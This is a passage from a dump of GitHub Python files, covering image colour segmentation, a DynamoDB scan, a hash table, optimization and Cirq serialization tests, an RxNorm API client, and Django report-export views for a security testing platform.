np.argmin(scores,axis=2)\n\t\tmask_img[np.where(scores_m==0)] = 1\n\t\t#kernel = np.ones((5,5))\n\t\t#mask_img = cv2.morphologyEx(mask_img, cv2.MORPH_OPEN, kernel)\n\n\n\t\tcurrent_image = np.asarray(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))\n\t\tv_channel = current_image[:,:,2]\n\t\taverage_illuminance = np.mean(np.mean(v_channel[np.where(mask_img==1)]))\n\t\tprint(average_illuminance)\n\t\t#current_image = current_image[:,:,0:2] #drop the v info\n\t\tcurrent_image = np.reshape(current_image,(960000,3))\n\t\ttarget_blue_score = np.log(abs(np.linalg.det(self.target_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.target_blue_mean.transpose(),np.linalg.inv(self.target_blue_cov))),current_image.transpose()-self.target_blue_mean),axis=0),(800,1200))\n\t\tkettle_blue_score = np.log(abs(np.linalg.det(self.kettle_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.kettle_blue_mean.transpose(),np.linalg.inv(self.kettle_blue_cov))),current_image.transpose()-self.kettle_blue_mean),axis=0),(800,1200))\n\t\tstick_blue_score = np.log(abs(np.linalg.det(self.stick_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.stick_blue_mean.transpose(),np.linalg.inv(self.stick_blue_cov))),current_image.transpose()-self.stick_blue_mean),axis=0),(800,1200))\n\t\twall_blue_score = np.log(abs(np.linalg.det(self.wall_blue_cov))) + 
np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.wall_blue_mean.transpose(),np.linalg.inv(self.wall_blue_cov))),current_image.transpose()-self.wall_blue_mean),axis=0),(800,1200))\n\t\tcarpet_blue_score = np.log(abs(np.linalg.det(self.carpet_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.carpet_blue_mean.transpose(),np.linalg.inv(self.carpet_blue_cov))),current_image.transpose()-self.carpet_blue_mean),axis=0),(800,1200))\n\t\tsecondscores = np.zeros((800,1200,5))\n\t\tsecondscores[:,:,0] = target_blue_score\n\t\tsecondscores[:,:,1] = kettle_blue_score\n\t\tsecondscores[:,:,2] = stick_blue_score\n\t\tsecondscores[:,:,3] = wall_blue_score\n\t\tsecondscores[:,:,4] = carpet_blue_score\n\t\t#secondscores[:,:,1] = target_blue_score+10\n\t\t#secondscores[:,:,2] = target_blue_score+10\n\t\t#secondscores[:,:,3] = target_blue_score+10\n\t\t#secondscores[:,:,4] = target_blue_score+10\n\t\tif average_illuminance < 100 and average_illuminance > 60:\n\t\t\tprint(1)\n\t\telse:\n\t\t\tsecondscores_m = np.argmin(secondscores,axis=2)\n\t\t\tsecondscores_m[np.where(mask_img==0)] = 1\n\t\t\tmask_img[np.where(secondscores_m!=0)] = 0\n\t\t\t\n\t\t#kernel = np.ones((3,3))\n\t\t#mask_img = cv2.morphologyEx(mask_img, cv2.MORPH_OPEN, kernel)\n\t\t#mask_img = cv2.dilate(mask_img,kernel,iterations = 1)\n\t\treturn mask_img\n\n\tdef get_bounding_box(self, img):\n\t\t'''\n\t\t\tFind the bounding box of the blue barrel\n\t\t\tcall other functions in this class if needed\n\t\t\t\n\t\t\tInputs:\n\t\t\t\timg - original image\n\t\t\tOutputs:\n\t\t\t\tboxes - a list of lists of bounding boxes. Each nested list is a bounding box in the form of [x1, y1, x2, y2] \n\t\t\t\twhere (x1, y1) and (x2, y2) are the top left and bottom right coordinate respectively. The order of bounding boxes in the list\n\t\t\t\tis from left to right in the image.\n\t\t\t\t\n\t\t\tOur solution uses xy-coordinate instead of rc-coordinate. 
More information: http://scikit-image.org/docs/dev/user_guide/numpy_images.html#coordinate-conventions\n\t\t'''\n\t\t# YOUR CODE HERE\n\t\timage = np.array(self.segment_image(img),np.uint8)*255\n\t\t#print(img.shape)\n\t\tret,thresh = cv2.threshold(image,127,255,0)\n\t\tcontours,hierarchy = cv2.findContours(thresh, 1, 2)\n\t\tboxes = []\n\n\t\t#print(np.shape(contours)[0])\n\t\tfor i in range(np.shape(contours)[0]):\n\t\t\tif (cv2.contourArea(contours[i])>200):\n\t\t\t\tx,y,w,h = cv2.boundingRect(contours[i])\n\t\t\t\tif h < 2.5*w and h > 1.3*w:\n\t\t\t\t\t#cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\n\t\t\t\t\tboxes.append([x,y,x+w,y+h])\n\t\t#cv2.imwrite('bounding_box_results/'+ str(1) + '.png', img)\n\t\tprint(boxes)\n\t\treturn boxes\n\n\nif __name__ == '__main__':\n\tfolder = \"trainset\"\n\tmy_detector = BarrelDetector()\n\tfor filename in os.listdir(folder):\n\t\t# read one test image\n\t\timg = cv2.imread(os.path.join(folder,filename))\n\t\tcv2.imshow('image', img)\n\t\tcv2.waitKey(0)\n\t\tcv2.destroyAllWindows()\n\n\t\t#Display results:\n\t\t#(1) Segmented images\n\t\tmask_img = my_detector.segment_image(img)\n\t\t#(2) Barrel bounding box\n\t\tboxes = my_detector.get_bounding_box(img)\n\t\t#The autograder checks your answers to the functions segment_image() and get_bounding_box()\n\t\t#Make sure your code runs as expected on the testset before submitting to Gradescope\n\n","repo_name":"shuangaj/Color_Segmentation","sub_path":"barrel_detector.py","file_name":"barrel_detector.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40586840399","text":"import boto3\nddb = boto3.client(\"dynamodb\")\n\ndef handler(event, context):\n\n    try:\n        data = ddb.scan(\n            TableName=\"hirutest\",\n            ExpressionAttributeValues={\n                ':c': {\n                    'S': \"black\"\n                },\n                ':p': {\n                    'S': \"500\"\n                }\n            },\n            FilterExpression=\"colour = :c and price < :p\"\n        )\n    except BaseException as e:\n        print(e)\n        raise(e)\n\n\n\n\n    \n    return {\"message\": data}\n","repo_name":"HirudineeADRT/1216_hiruddb","sub_path":"1216_hiruddb/ddbcreator.py","file_name":"ddbcreator.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18570527331","text":"import hashlib\nimport math\n\n\nclass HashTable:\n    def __init__(self, sz, stp):\n        self.size = sz\n        self.step = stp\n        self.slots = [None] * self.size\n\n    def hash_fun(self, value):\n        '''\n        values passed in are strings!\n        '''\n        hash = hashlib.sha1()\n        hash.update(value.encode())\n        hash = int(hash.hexdigest()[:math.ceil(\n            self.size / 16)], 16)  # hex to int\n        return hash % self.size\n\n    def seek_slot(self, value):\n        '''\n        finds the index of an empty slot for the value, or None\n        '''\n        slot = self.hash_fun(value)\n        # repair collision\n        max_loop = 10 * self.size\n        while self.slots[slot] != None:\n            max_loop -= 1\n            if max_loop < 0:\n                return None\n\n            if abs(self.step) >= self.size:\n                return None\n\n            slot += self.step\n            if slot >= self.size:\n                slot -= self.size\n        return slot\n\n    def put(self, value):\n        '''\n        writes the value at the slot given by the hash function;\n        returns the slot index or None\n        if collisions prevent placing the element\n        '''\n        slot = self.seek_slot(value)\n        if slot == None:\n            return None\n        self.slots[slot] = value\n        return slot\n\n    def find(self, value):\n        '''\n        finds the index of the slot holding the value, or None\n        '''\n        slot = self.hash_fun(value)\n        max_loop = 100\n        while self.slots[slot] != 
value:\n max_loop -= 1\n if max_loop < 0:\n return None\n\n if abs(self.step) >= self.size:\n return None\n\n slot += self.step\n if slot >= self.size:\n slot -= self.size\n return slot\n\n def get_slots(self):\n return self.slots\n","repo_name":"mcnic/algorithms","sub_path":"hashTable.py","file_name":"hashTable.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12057795274","text":"import numpy as np\nimport unittest\nimport sys\nsys.path.append(\"..\")\nsys.path.append(\"../../..\")\n\n\n\n# import the test classes\n\n\n\nfrom optimization_algorithms.utils.finite_diff import *\nfrom optimization_algorithms.interface.mathematical_program import MathematicalProgram\n\nfrom solution import Problem0\n\nclass testProblem(unittest.TestCase):\n \"\"\"\n test on problem A\n \"\"\"\n\n problem = Problem0\n\n def testValue(self):\n C = np.ones((2,2))\n problem = self.problem(C)\n value = problem.evaluate(np.ones(2))[0][0]\n self.assertAlmostEqual(value,8)\n\n\n def testJacobian(self):\n \"\"\"\n \"\"\"\n C = np.ones((2,2))\n problem = self.problem(C)\n flag , _ , _= check_mathematical_program(problem.evaluate, np.array([-1,.5]) , 1e-5)\n self.assertTrue(flag)\n\n\n def testHessian(self):\n\n C = np.ones((2,2))\n problem = self.problem(C)\n x = np.array([-1, .1])\n H = problem.getFHessian(x)\n\n def f(x):\n return problem.evaluate(x)[0][0]\n\n tol = 1e-4\n Hdiff = finite_diff_hess(f,x,tol) \n flag = np.allclose( H , Hdiff, 10*tol, 10*tol)\n self.assertTrue(flag)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","repo_name":"Perceptronium/Optimization","sub_path":"a0_quadratic_function/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"394487786","text":"import os\nfrom distutils.core import setup\n\n\n# Utility function to read the README file.\n# Used for the long_description. 
It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n    return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n    name='ShowInstalledPackages',\n    packages=['ShowInstalledPackages'], # this must be the same as the name above\n    description='List all user installed packages and details',\n    version='0.1.1',\n    author='Larry McCaig (Larz60+)',\n    author_email='larry@dimplechad.com',\n    long_description=read('README.md'),\n    license=\"MIT\",\n    url='https://github.com/Larz60p/ShowInstalledPackages',\n    download_url='https://github.com/Larz60p/ShowInstalledPackages/tarball/0.1.1',\n    keywords='tools packages installed utilities',\n    classifiers=[\n        'Development Status :: 3 - Alpha',\n        'Topic :: Utilities',\n        'License :: OSI Approved :: MIT License',\n    ],\n)\n","repo_name":"Larz60p/ShowInstalledPackages","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24319858877","text":"import requests\nimport simplejson as json\nfrom typing import Dict\n\n\nclass RxNormIngredientATCConceptCall(object):\n    \"\"\"\n    Class encapsulates the data needed to call the RxNorm API and return the linked data elements for ATC mapping\n    from a string.\n    \"\"\"\n\n    def __init__(self, ingredient_name: str):\n        self.ingredient_name = ingredient_name\n        self.rxnorm_api_base = 'https://rxnav.nlm.nih.gov/REST/'\n        self.get_rxnorm_code_url = '{base}approximateTerm.json?term={ingredient_name}&maxEntries=1'.format(\n            ingredient_name=self.ingredient_name,\n            base=self.rxnorm_api_base)  # Limit to top result\n        self.rxcui = self.parse_get_rxnorm()\n        self.get_atc_code_url = '{base}rxcui/{rxcui}/property?propName=ATC'.format(\n            rxcui=self.rxcui,\n            base=self.rxnorm_api_base)\n        self.atc_code = self.parse_atc_code()\n\n    @staticmethod\n    def rx_norm_api_call(url: str) -> Dict:\n        results = requests.get(url, headers={'Accept': 'application/json'})\n        if results.status_code == 200:\n            return json.loads(results.text)\n\n    def parse_get_rxnorm(self) -> str:\n        results = RxNormIngredientATCConceptCall.rx_norm_api_call(self.get_rxnorm_code_url)\n        if results['approximateGroup'].get('candidate', None) is not None:\n            return list(\n                set([r.get('rxcui', None) for r in results['approximateGroup']['candidate'] if\n                     r['rank'] == '1']))[0]\n\n    def parse_atc_code(self) -> str:\n        results = RxNormIngredientATCConceptCall.rx_norm_api_call(self.get_atc_code_url)\n        if results['propConceptGroup'] is not None:\n            return list(set([r['propValue'] for r in results['propConceptGroup'].get('propConcept', [None])]))[0]\n\n\nif __name__ == '__main__':\n    res = RxNormIngredientATCConceptCall('gabapentin')\n    print(res.get_rxnorm_code_url)\n    print(res.rxcui)\n    print(res.atc_code)\n","repo_name":"r4intra/bainbridge_demo","sub_path":"code/utils/rxnorm_api_caller.py","file_name":"rxnorm_api_caller.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22179159576","text":"import numpy as np\nimport pytest\nimport sympy\n\nfrom google.protobuf import json_format\n\nimport cirq_google\nfrom cirq_google.serialization.arg_func_langs import (\n    arg_from_proto,\n    arg_to_proto,\n    float_arg_from_proto,\n    float_arg_to_proto,\n    internal_gate_arg_to_proto,\n    internal_gate_from_proto,\n    ARG_LIKE,\n    LANGUAGE_ORDER,\n)\nfrom cirq_google.api import 
v2\n\n\n@pytest.mark.parametrize(\n 'min_lang,value,proto',\n [\n ('', 1.0, {'arg_value': {'float_value': 1.0}}),\n ('', 1, {'arg_value': {'float_value': 1.0}}),\n ('', 'abc', {'arg_value': {'string_value': 'abc'}}),\n ('', [True, False], {'arg_value': {'bool_values': {'values': [True, False]}}}),\n ('', [42.9, 3.14], {'arg_value': {'double_values': {'values': [42.9, 3.14]}}}),\n ('', [3, 8], {'arg_value': {'int64_values': {'values': ['3', '8']}}}),\n ('', ['t1', 't2'], {'arg_value': {'string_values': {'values': ['t1', 't2']}}}),\n ('', sympy.Symbol('x'), {'symbol': 'x'}),\n (\n 'linear',\n sympy.Symbol('x') - sympy.Symbol('y'),\n {\n 'func': {\n 'type': 'add',\n 'args': [\n {'symbol': 'x'},\n {\n 'func': {\n 'type': 'mul',\n 'args': [{'arg_value': {'float_value': -1.0}}, {'symbol': 'y'}],\n }\n },\n ],\n }\n },\n ),\n (\n 'exp',\n sympy.Symbol('x') ** sympy.Symbol('y'),\n {'func': {'type': 'pow', 'args': [{'symbol': 'x'}, {'symbol': 'y'}]}},\n ),\n ],\n)\ndef test_correspondence(min_lang: str, value: ARG_LIKE, proto: v2.program_pb2.Arg):\n msg = v2.program_pb2.Arg()\n json_format.ParseDict(proto, msg)\n min_i = LANGUAGE_ORDER.index(min_lang)\n for i, lang in enumerate(LANGUAGE_ORDER):\n if i < min_i:\n with pytest.raises(ValueError, match='not supported by arg_function_language'):\n _ = arg_to_proto(value, arg_function_language=lang)\n with pytest.raises(ValueError, match='Unrecognized function type'):\n _ = arg_from_proto(msg, arg_function_language=lang)\n else:\n parsed = arg_from_proto(msg, arg_function_language=lang)\n packed = json_format.MessageToDict(\n arg_to_proto(value, arg_function_language=lang),\n including_default_value_fields=True,\n preserving_proto_field_name=True,\n use_integers_for_enums=True,\n )\n\n assert parsed == value\n assert packed == proto\n\n\ndef test_double_value():\n \"\"\"Note: due to backwards compatibility, double_val conversion is one-way.\n double_val can be converted to python float,\n but a python float is converted into a float_val not a double_val.\n \"\"\"\n msg = v2.program_pb2.Arg()\n msg.arg_value.double_value = 1.0\n parsed = arg_from_proto(msg, arg_function_language='')\n assert parsed == 1\n\n\ndef test_serialize_sympy_constants():\n proto = arg_to_proto(sympy.pi, arg_function_language='')\n packed = json_format.MessageToDict(\n proto,\n including_default_value_fields=True,\n preserving_proto_field_name=True,\n use_integers_for_enums=True,\n )\n assert len(packed) == 1\n assert len(packed['arg_value']) == 1\n # protobuf 3.12+ truncates floats to 4 bytes\n assert np.isclose(packed['arg_value']['float_value'], np.float32(sympy.pi), atol=1e-7)\n\n\ndef test_unsupported_function_language():\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_to_proto(\n sympy.Symbol('a') + sympy.Symbol('b'), arg_function_language='NEVER GONNAH APPEN'\n )\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_to_proto(3 * sympy.Symbol('b'), arg_function_language='NEVER GONNAH APPEN')\n with pytest.raises(ValueError, match='Unrecognized arg_function_language'):\n _ = arg_from_proto(\n v2.program_pb2.Arg(\n func=v2.program_pb2.ArgFunction(\n type='add',\n args=[v2.program_pb2.Arg(symbol='a'), v2.program_pb2.Arg(symbol='b')],\n )\n ),\n arg_function_language='NEVER GONNAH APPEN',\n )\n\n\n@pytest.mark.parametrize(\n 'value,proto',\n [\n ((True, False), {'arg_value': {'bool_values': {'values': [True, False]}}}),\n (\n np.array([True, False], dtype=bool),\n {'arg_value': {'bool_values': {'values': 
[True, False]}}},\n        ),\n    ],\n)\ndef test_serialize_conversion(value: ARG_LIKE, proto: v2.program_pb2.Arg):\n    msg = v2.program_pb2.Arg()\n    json_format.ParseDict(proto, msg)\n    packed = json_format.MessageToDict(\n        arg_to_proto(value, arg_function_language=''),\n        including_default_value_fields=True,\n        preserving_proto_field_name=True,\n        use_integers_for_enums=True,\n    )\n    assert packed == proto\n\n\n@pytest.mark.parametrize(\n    'value,proto',\n    [\n        (4, v2.program_pb2.FloatArg(float_value=4.0)),\n        (1.0, v2.program_pb2.FloatArg(float_value=1.0)),\n        (sympy.Symbol('a'), v2.program_pb2.FloatArg(symbol='a')),\n        (\n            sympy.Symbol('a') + sympy.Symbol('b'),\n            v2.program_pb2.FloatArg(\n                func=v2.program_pb2.ArgFunction(\n                    type='add',\n                    args=[v2.program_pb2.Arg(symbol='a'), v2.program_pb2.Arg(symbol='b')],\n                )\n            ),\n        ),\n    ],\n)\ndef test_float_args(value, proto):\n    assert float_arg_to_proto(value) == proto\n    assert float_arg_from_proto(proto, arg_function_language='exp') == value\n\n\ndef test_missing_required_arg():\n    with pytest.raises(ValueError, match='blah is missing'):\n        _ = float_arg_from_proto(\n            v2.program_pb2.FloatArg(), arg_function_language='exp', required_arg_name='blah'\n        )\n    with pytest.raises(ValueError, match='unrecognized argument type'):\n        _ = arg_from_proto(\n            v2.program_pb2.Arg(), arg_function_language='exp', required_arg_name='blah'\n        )\n    with pytest.raises(ValueError, match='Unrecognized function type '):\n        _ = arg_from_proto(\n            v2.program_pb2.Arg(func=v2.program_pb2.ArgFunction(type='magic')),\n            arg_function_language='exp',\n            required_arg_name='blah',\n        )\n    assert arg_from_proto(v2.program_pb2.Arg(), arg_function_language='exp') is None\n\n\ndef test_unrecognized_arg():\n    \"\"\"Getting to some parts of the code implies that the\n    set of supported languages has changed. 
Modify the\n supported languages to simulate this future code change.\"\"\"\n cirq_google.serialization.arg_func_langs.SUPPORTED_FUNCTIONS_FOR_LANGUAGE['test'] = frozenset(\n {'magic'}\n )\n\n with pytest.raises(ValueError, match='could not be processed'):\n _ = float_arg_from_proto(\n v2.program_pb2.Arg(func=v2.program_pb2.ArgFunction(type='magic')),\n arg_function_language='test',\n required_arg_name='blah',\n )\n # Clean up for hermetic testing\n del cirq_google.serialization.arg_func_langs.SUPPORTED_FUNCTIONS_FOR_LANGUAGE['test']\n\n\ndef test_invalid_float_arg():\n with pytest.raises(ValueError, match='unrecognized argument type'):\n _ = float_arg_from_proto(\n v2.program_pb2.Arg(arg_value=v2.program_pb2.ArgValue(float_value=0.5)),\n arg_function_language='test',\n required_arg_name='blah',\n )\n\n\n@pytest.mark.parametrize('rotation_angles_arg', [{}, {'rotation_angles': [0.1, 0.3]}])\n@pytest.mark.parametrize('qid_shape_arg', [{}, {'qid_shape': [2, 2]}])\n@pytest.mark.parametrize('tags_arg', [{}, {'tags': ['test1', 'test2']}])\n@pytest.mark.parametrize('lang', LANGUAGE_ORDER)\ndef test_internal_gate_serialization(rotation_angles_arg, qid_shape_arg, tags_arg, lang):\n g = cirq_google.InternalGate(\n gate_name='g',\n gate_module='test',\n num_qubits=5,\n **rotation_angles_arg,\n **qid_shape_arg,\n **tags_arg,\n )\n proto = v2.program_pb2.InternalGate()\n internal_gate_arg_to_proto(g, out=proto)\n v = internal_gate_from_proto(proto, lang)\n assert g == v\n\n\ndef test_invalid_list():\n with pytest.raises(ValueError):\n _ = arg_to_proto(['', 1])\n\n with pytest.raises(ValueError):\n _ = arg_to_proto([1.0, ''])\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-google/cirq_google/serialization/arg_func_langs_test.py","file_name":"arg_func_langs_test.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"25363740353","text":"# -*- coding: utf-8 -*-\n# Disabling this rule is necessary for include returns inside if-else structure\n# pylint: disable-msg=no-else-return\n# pylint: disable=too-many-lines\n\"\"\"Views and services for FluidIntegrates.\"\"\"\n\nimport os\nimport sys\nimport time\nfrom datetime import datetime, timedelta\n\nimport boto3\nimport rollbar\nimport yaml\nfrom django.conf import settings\nfrom django.core.cache.backends.base import DEFAULT_TIMEOUT\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.cache import never_cache, cache_control\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_http_methods\nfrom jose import jwt\nfrom magic import Magic\nfrom openpyxl import load_workbook, Workbook\n\nfrom backend import util\nfrom backend.domain import (\n finding as finding_domain, project as project_domain, user as user_domain)\nfrom backend.domain.vulnerability import (\n group_specific, get_open_vuln_by_type, get_vulnerabilities_by_type\n)\nfrom backend.decorators import authenticate, authorize, cache_content\nfrom backend.dal import (\n finding as finding_dal, user as user_dal\n)\nfrom backend.services import (\n has_access_to_project, has_access_to_finding, has_access_to_event\n)\nfrom backend.utils import reports\n\nfrom __init__ import (\n FI_AWS_S3_ACCESS_KEY, FI_AWS_S3_SECRET_KEY, FI_AWS_S3_BUCKET\n)\n\nfrom app.documentator.pdf import CreatorPDF\nfrom app.documentator.secure_pdf import SecurePDF\nfrom app.documentator.all_vulns import 
generate_all_vulns_xlsx\nfrom app.techdoc.it_report import ITReport\n\nCACHE_TTL = getattr(settings, 'CACHE_TTL', DEFAULT_TIMEOUT)\n\nCLIENT_S3 = boto3.client('s3',\n aws_access_key_id=FI_AWS_S3_ACCESS_KEY,\n aws_secret_access_key=FI_AWS_S3_SECRET_KEY)\n\nBUCKET_S3 = FI_AWS_S3_BUCKET\nBASE_URL = \"https://fluidattacks.com/integrates\"\n\n\n@never_cache\ndef index(request):\n \"Login view for unauthenticated users\"\n parameters = {'debug': settings.DEBUG}\n return render(request, \"index.html\", parameters)\n\n\ndef error500(request):\n \"Internal server error view\"\n parameters = {}\n return render(request, \"HTTP500.html\", parameters)\n\n\ndef error401(request, _):\n \"Unauthorized error view\"\n parameters = {}\n return render(request, \"HTTP401.html\", parameters)\n\n\n@csrf_exempt\n@cache_control(private=True, max_age=3600)\n@authenticate\ndef app(request):\n \"\"\" App view for authenticated users \"\"\"\n try:\n parameters = {\n 'debug': settings.DEBUG,\n 'username': request.session['username']\n }\n response = render(request, 'app.html', parameters)\n token = jwt.encode(\n {\n 'user_email': request.session['username'],\n 'user_role': request.session['role'],\n 'company': request.session['company'],\n 'first_name': request.session['first_name'],\n 'last_name': request.session['last_name'],\n 'exp': datetime.utcnow() +\n timedelta(seconds=settings.SESSION_COOKIE_AGE)\n },\n algorithm='HS512',\n key=settings.JWT_SECRET,\n )\n response.set_cookie(\n key=settings.JWT_COOKIE_NAME,\n value=token,\n secure=True,\n # Temporary while ariadne migration is finished\n httponly=not settings.DEBUG,\n max_age=settings.SESSION_COOKIE_AGE\n )\n except KeyError:\n rollbar.report_exc_info(sys.exc_info(), request)\n return redirect('/integrates/error500')\n return response\n\n\n@csrf_exempt\n@authenticate\ndef logout(request):\n \"Close a user's active session\"\n\n HttpResponse(\"\")\n try:\n request.session.flush()\n except KeyError:\n rollbar.report_exc_info(sys.exc_info(), request)\n\n response = redirect(\"/integrates/index\")\n response.delete_cookie(settings.JWT_COOKIE_NAME)\n return response\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef project_to_xls(request, lang, project):\n \"Create the technical report\"\n username = request.session['username'].split(\"@\")[0]\n if project.strip() == \"\":\n rollbar.report_message(\n 'Error: Empty fields in project', 'error', request)\n return util.response([], 'Empty fields', True)\n if not has_access_to_project(request.session['username'],\n project, request.session['role']):\n util.cloudwatch_log(\n request,\n 'Security: Attempted to export project xls without permission')\n return util.response([], 'Access denied', True)\n if lang not in [\"es\", \"en\"]:\n rollbar.report_message('Error: Unsupported language', 'error', request)\n return util.response([], 'Unsupported language', True)\n findings = finding_domain.get_findings(\n project_domain.list_findings(project.lower()))\n if findings:\n findings = [cast_new_vulnerabilities(\n get_open_vuln_by_type(finding['findingId'], request), finding)\n for finding in findings]\n else:\n rollbar.report_message(\n 'Project {} does not have findings in dynamo'.format(project),\n 'warning',\n request)\n return util.response([], 'Empty fields', True)\n data = util.ord_asc_by_criticidad(findings)\n it_report = ITReport(project, data, username)\n filepath = it_report.result_filename\n reports.set_xlsx_password(filepath, time.strftime('%d%m%Y') + username)\n\n with 
open(filepath, 'rb') as document:\n response = HttpResponse(document.read())\n response['Content-Type'] = ('application/vnd.openxmlformats'\n '-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'inline;filename={}.xlsx'.format(\n project)\n return response\n\n\ndef validation_project_to_pdf(request, lang, doctype):\n if lang not in [\"es\", \"en\"]:\n rollbar.report_message('Error: Unsupported language', 'error', request)\n return util.response([], 'Unsupported language', True)\n if doctype not in [\"tech\", \"executive\"]:\n rollbar.report_message('Error: Unsupported doctype', 'error', request)\n return util.response([], 'Unsupported doctype', True)\n return None\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef project_to_pdf(request, lang, project, doctype):\n \"Export a project to a PDF\"\n assert project.strip()\n if not has_access_to_project(request.session['username'],\n project, request.session['role']):\n util.cloudwatch_log(request, 'Security: Attempted to export project'\n ' pdf without permission')\n return util.response([], 'Access denied', True)\n else:\n user = request.session['username'].split('@')[0]\n validator = validation_project_to_pdf(request, lang, doctype)\n if validator is not None:\n return validator\n findings = finding_domain.get_findings(\n project_domain.list_findings(project.lower()))\n findings = [cast_new_vulnerabilities(\n get_open_vuln_by_type(finding['findingId'], request), finding)\n for finding in findings]\n description = project_domain.get_description(project.lower())\n\n pdf_maker = CreatorPDF(lang, doctype)\n secure_pdf = SecurePDF()\n findings_ord = util.ord_asc_by_criticidad(findings)\n findings = pdf_evidences(findings_ord)\n report_filename = ''\n if doctype == 'tech':\n pdf_maker.tech(findings, project, description)\n report_filename = secure_pdf.create_full(user,\n pdf_maker.out_name,\n project)\n else:\n return HttpResponse(\n 'Disabled report generation', content_type='text/html')\n if not os.path.isfile(report_filename):\n rollbar.report_message(\n 'Couldn\\'t generate pdf report', 'error', request)\n return HttpResponse(\n 'Couldn\\'t generate pdf report', content_type='text/html')\n with open(report_filename, 'rb') as document:\n response = HttpResponse(document.read(),\n content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'inline;filename={}_IT.pdf'.format(project)\n return response\n\n\ndef pdf_evidences(findings):\n for finding in findings:\n folder_name = finding['projectName'] + '/' + finding['findingId']\n evidence = finding['evidence']\n evidence_set = [{\n 'id': '{}/{}'.format(folder_name, evidence[ev_item]['url']),\n 'explanation': evidence[ev_item]['description'].capitalize()\n } for ev_item in evidence if evidence[ev_item]['url'].endswith('.png')]\n\n if evidence_set:\n finding['evidence_set'] = evidence_set\n for evidence in evidence_set:\n CLIENT_S3.download_file(\n BUCKET_S3,\n evidence['id'],\n '/usr/src/app/app/documentator/images/' +\n evidence['id'].split('/')[2])\n evidence['name'] = 'image::../images/' + \\\n evidence['id'].split('/')[2] + '[align=\"center\"]'\n\n return findings\n\n\ndef cast_new_vulnerabilities(finding_new, finding):\n \"\"\"Cast values for new format.\"\"\"\n if finding_new.get('openVulnerabilities') >= 0:\n finding['openVulnerabilities'] = \\\n str(finding_new.get('openVulnerabilities'))\n else:\n # This finding does not have open vulnerabilities\n pass\n where = '-'\n if finding_new.get('portsVulns'):\n 
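# ports, lines and inputs vulns are each grouped via group_specific and folded into the human-readable 'where' summary below\n        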
finding['portsVulns'] = \\\n group_specific(finding_new.get('portsVulns'), 'ports')\n where = format_where(where, finding['portsVulns'])\n else:\n # This finding does not have ports vulnerabilities\n pass\n if finding_new.get('linesVulns'):\n finding['linesVulns'] = \\\n group_specific(finding_new.get('linesVulns'), 'lines')\n where = format_where(where, finding['linesVulns'])\n else:\n # This finding does not have lines vulnerabilities\n pass\n if finding_new.get('inputsVulns'):\n finding['inputsVulns'] = \\\n group_specific(finding_new.get('inputsVulns'), 'inputs')\n where = format_where(where, finding['inputsVulns'])\n else:\n # This finding does not have inputs vulnerabilities\n pass\n finding['where'] = where\n return finding\n\n\ndef format_where(where, vulnerabilities):\n \"\"\"Formate where field with new vulnerabilities.\"\"\"\n for vuln in vulnerabilities:\n where = '{where!s}{vuln_where!s} ({vuln_specific!s})\\n'\\\n .format(where=where,\n vuln_where=vuln.get('where'),\n vuln_specific=vuln.get('specific'))\n return where\n\n\ndef format_release_date(finding):\n finding_dynamo = finding_domain.get_finding(finding['findingId'])\n if finding_dynamo:\n if finding_dynamo[0].get(\"releaseDate\"):\n finding[\"releaseDate\"] = finding_dynamo[0].get(\"releaseDate\")\n if finding_dynamo[0].get(\"lastVulnerability\"):\n finding[\"lastVulnerability\"] = \\\n finding_dynamo[0].get(\"lastVulnerability\")\n if finding.get(\"releaseDate\"):\n final_date = util.calculate_datediff_since(finding[\"releaseDate\"])\n finding['edad'] = final_date.days\n final_vuln_date = util.calculate_datediff_since(finding[\"lastVulnerability\"])\n finding['lastVulnerability'] = final_vuln_date.days\n else:\n finding['lastVulnerability'] = '-'\n return finding\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@authorize(['analyst', 'customer', 'admin'])\ndef get_evidence(request, project, evidence_type, findingid, fileid):\n username = request.session['username']\n role = request.session['role']\n if (evidence_type in ['drafts', 'findings']\n and has_access_to_finding(username, findingid, role)) \\\n or (evidence_type == 'events'\n and has_access_to_event(username, findingid, role)):\n if fileid is None:\n rollbar.report_message('Error: 